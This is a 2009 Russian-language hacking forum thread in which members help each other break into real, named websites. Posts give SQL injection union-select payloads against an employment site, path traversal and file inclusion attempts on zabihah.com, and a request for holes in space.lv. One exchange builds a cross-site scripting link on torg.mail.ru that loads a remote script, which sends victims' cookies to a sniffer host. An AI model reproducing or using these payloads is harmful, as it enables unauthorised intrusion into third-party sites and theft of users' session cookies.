Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    мда, информации море:

    1. Для вывода одного параметра concat нафинг не нужен (тогда уже group_concat)
    2. Проверить правильность написания именя поля + имени таблицы
    3. Попробуй unhex(hex(tp))
    4. Ссылку в студию или в личку
    5. "кроме всяческих ошибок" - текст ошибок когда в студии - 99% успешных подсказок.
    6. Пустая табла - пробуй считать - -24+union+select+1,count(tp)+from+events--

    по п.6 - скорее всего 0 выведет
     
    #5781 Pashkela, 8 Mar 2009
    Last edited: 8 Mar 2009
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    покажи ссылку что догадки строить, так до утра будешь искать
     
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    таблица events существует? поле tp существует?
    попробуй для начала
    -1+union+select+1,2--
     
  4. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    да всё сушествует..
    кароче ошибка:
    No database selected : никакая база данных не выбранна!
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Заканчивай с гаданием. Без линка на вопрос не ответить. Я готов поспорить, что там всё элементарно, и тебе уже ответили на вопрос. Не хочешь сюда линк, кто-то там в приват просил, а гадания на 10 страниц ни к чему

    https://forum.antichat.ru/thread104591.html
    вопросы 2.3.4. Если после прочтения ответов на эти вопросы ничего не получится , линк или сюда или в ПМ. Я это писал для того, что-бы вопросы по кругу не ходили, но видимо бесполезно потратил время
     
    #5785 Kakoytoxaker, 8 Mar 2009
    Last edited: 8 Mar 2009
  6. telas

    telas New Member

    Joined:
    17 Sep 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите на каком движке сайт и если можно какие дыры есть http://space.lv
     
  7. VIP

    VIP Elder - Старейшина

    Joined:
    29 Dec 2004
    Messages:
    104
    Likes Received:
    3
    Reputations:
    0
    Как быть ofline на vkontakte.ru

    Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

    Где под firefox 3 в ubuntu можно найти сам этот profile.php ?
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://www.zabihah.com/da.php?id=../
    можно ли что нибудь проинклудить, при вот таом префиксе..
     
    _________________________
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Подскажите здесь есть вывод данных -
    http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4,5,6--+ ?
     
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Тут:

    Code:
    http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0,11,12/*
     
    2 people like this.
  11. serfertty

    serfertty Guest

    Reputations:
    0
    Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?
     
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    как они выглядят покажи
     
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    В basic используется Base64 шифрование.
     
  14. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом
     
  15. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    http://www.zabihah.com/da.php?id=1/../../../../../index
     
  16. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    :confused:
    Вопрос:
    допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

    Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????
     
  17. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...
     
  18. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    если хош украсть куки тебе ишо нужен сниффер!
    тута усе расписано было!
     
  19. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Т.е. выглядеть будет примерно так???:

    http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

    А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;
     
  20. VIP

    VIP Elder - Старейшина

    Joined:
    29 Dec 2004
    Messages:
    104
    Likes Received:
    3
    Reputations:
    0
    Как быть offline vkontakte.ru
     
Thread Status:
Not open for further replies.